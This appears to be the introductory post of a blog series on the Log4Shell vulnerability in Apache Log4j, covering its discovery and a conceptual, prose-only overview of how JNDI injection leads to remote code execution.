On November 24th, 2021 Chen Zhaojun, a Security Researcher on Alibaba’s Cloud Security Team, notified the Apache Software Foundation of a critical vulnerability within it’s Log4j library. Weeks later, the vulnerability, known as Log4Shell, took the world by storm. With a majority of all internet facing applications susceptible to Log4Shell, we’re going to open a three-part series covering an overview of the vulnerability, how to exploit it, and most importantly, how to defend against it.
Log4j is an open-source code library developed by the Apache Software Foundation and utilized by countless applications around the world. Specifically, developers use Log4j to log information about application usage, such as access timestamps, user information, and error reporting.
In late November, Alibaba Cloud Security researchers discovered Log4j was susceptible to Remote Code Execution (RCE) via a vulnerability known as Java Naming and Directory Interface (JNDI) Injection. For more information on JNDI Injections, we recommend reading Alvaro Muñoz and Oleksandr Mirosh’s presentation at Blackhat 2016. As a general overview, an attacker “injects” a snippet of code into its application request, which is then logged by Log4j. That snippet of code then triggers a lookup to attacker controlled external codebase. The vulnerable application then retrieves and runs the attacker’s remote java code, hence triggering the RCE. The diagram below illustrates the exploitation of the Log4j vulnerability and how to prevent it (in green):
How is Log4Shell actually exploited? What can we do to defend against it? Tune in next week for our new installment of the series.